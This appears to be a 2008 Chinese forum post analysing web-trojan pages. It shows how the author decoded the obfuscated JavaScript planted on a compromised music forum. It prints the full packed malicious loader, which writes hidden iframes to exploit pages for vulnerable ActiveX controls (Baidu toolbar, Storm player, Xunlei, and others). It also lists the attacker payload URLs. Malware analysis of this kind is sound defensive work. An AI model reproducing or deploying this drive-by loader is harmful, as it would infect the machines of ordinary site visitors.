引用:
写在前面:
首先要感谢认识和不认识的一些朋友,是你们无私的分享让我这只小菜鸟也能够解密简单的加密代码,懒人小G(是你的网页解密教程让我第一次解密出一个网页挂马的),番茄(从你的空间里面获得了FreShow-网页解密辅助工具),网络巡警(你的空间有很多关于漏洞的介绍),鬼仔(你的空间的好东西实在是太多了),六翼刺猬(有很多网站挂马的分析),jimmyleo(感谢你的feShow),正奇(谢谢你的指导),春哥(感谢你的轻轻松松解密各种网页木马)...还有很多人啊 ^_^基本我的空间链接里面都有
实例分析1:
目标代码一个利用real漏洞的网马(h**p://town.521town.com/wm/rl.js)
1,使用httpdebug获取网页源代码
2,发现是一个典型的real漏洞利用的网马,将codes=后面的内容复制到小G的ALPHA编码转换器里面转换以后就能够得出这个网马下载的地址了
实例分析2
目标网站琴龙乐器(
http://bbs.guitarq.com/index.asp)
1,使用freshow直接获取网页源代码
最终获取的源代码,是不是很熟悉啊小G的教程里面有介绍吧吧
document.getElementById("textareaID").innerText= 解密吧复制内容到剪贴板
代码:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1E E(){1D(i=2;i<1C;i++){l t=4 W();l s=4 W();l u=F.1B(1A+i);t.6="V:@U:"+u+":\\\\T%S\\\\q%R\\\\q%Q%P%1z.0\\\\O\\\\N.M::/L/K.9";s.6="V:@U:"+u+":\\\\T%S\\\\q%R\\\\q%Q%P%1y.0\\\\O\\\\N.M::/L/K.9";5(t.J==I||s.J==I)H 1x}H 1w}1v="1u&&&&&&&&&&&&&&&&&&&&&&&&1t";l p=4 1s();p.1r(p.1q()+1p*G*G*1o);l D=4 F(8.x);l C="v=";5(!E()&&D.B(C)==-1){k{5(4 o("1n"+"1m.1l"+"1k.1"))8.j(\'<3 h=n:f 6="c://m.b/1j.9"></3>\')}a(e){}k{5(4 o("1i.1h"+"1g"+"1f.1"))8.j(\'<3 h=n:f 6="c://m.b/1e.9"></3>\')}a(e){}k{5(1d.1c.1b().B("A"+"1a 7")==-1)8.j(\'<3 h=n:f 6="c://m.b/A.9"></3>\')}a(e){}k{5(4 o("z"+"y"+".z"+"y.1"))8.j(\'<3 h=d\'+\'19\'+\'17:f 6="c://w\'+\'18\'+\'.b/r\'+\'16.g\'+\'5"></3>\')}a(e){}k{5(4 o("15.14.1"))8.j(\'<3 h=n:f 6="c://m.b/13.9"></3>\')}a(e){}8.x="v=12;11="+p.10();k{5(4 o("Z.Y"))8.j(\'<3 h=n:f 6="c://m.b/X.9"></3>\')}a(e){}}',62,103,'|||iframe|new|if|src||document|gif|catch|vg|http|||none||style||write|try|var|w18|display|ActiveXObject|Then|Kaspersky||bbbbbbbbbbbkis7|bbbbbbbbkis6|rootCookie1||cookie|PCtl|IER|ms|indexOf|cookieHeader|fdsafasdfasdfcookie|bIsKIS|String|60|return|41|height|help|images|chm|context|Doc|20Security|20Internet|20Lab|20Files|Program|MSITStore|mk|Image|xl|Vod|DPClient|toGMTString|expires|POPWINDOS|lz|GLChatCtrl|GLCHAT|eal|lay||isp|ie|toLowerCase|userAgent|navigator|bf|layer|ormP|St|MPS|baidu|ol|To|duBar|Bai|1000|24|getTime|setTime|Date|FDFff454545|xxxx|bbbbbbbbbbbbbsdfdsfdfdf|false|true|207|206|65|fromCharCode|26|for|function'.split('|'),0,{}))解密后的提取关键的代码,并参考巡警的2007网马总结文章复制内容到剪贴板
代码:
ActiveXObject("BaiduBar.Tool.1"))--百度搜霸ActiveX控件远程代码执行漏洞
http://w18.vg/baidu.gif
ActiveXObject("MPS.StormPlayer.1"))--暴风影音2 mps.dll组件多个缓冲区溢出漏洞
http://w18.vg/bf.gif
navigator.userAgent.("msie7")--不知道什么漏洞,不能下载下来 ^_^
http://w18.vg/ms.gif
ActiveXObject("IERPCtlIERPCtl.1")--同上
http://w18.vg/real.gif
ActiveXObject("GLCHAT.GLChatCtrl.1")--联众游戏聊天室组件漏洞
http://w18.vg/lz.gif
ActiveXObject("DPClient.Vod")--迅雷5漏洞
http://w18.vg/xl.gif[
本帖最后由 一把锈剑 于 2008-2-25 11:07 编辑 ]
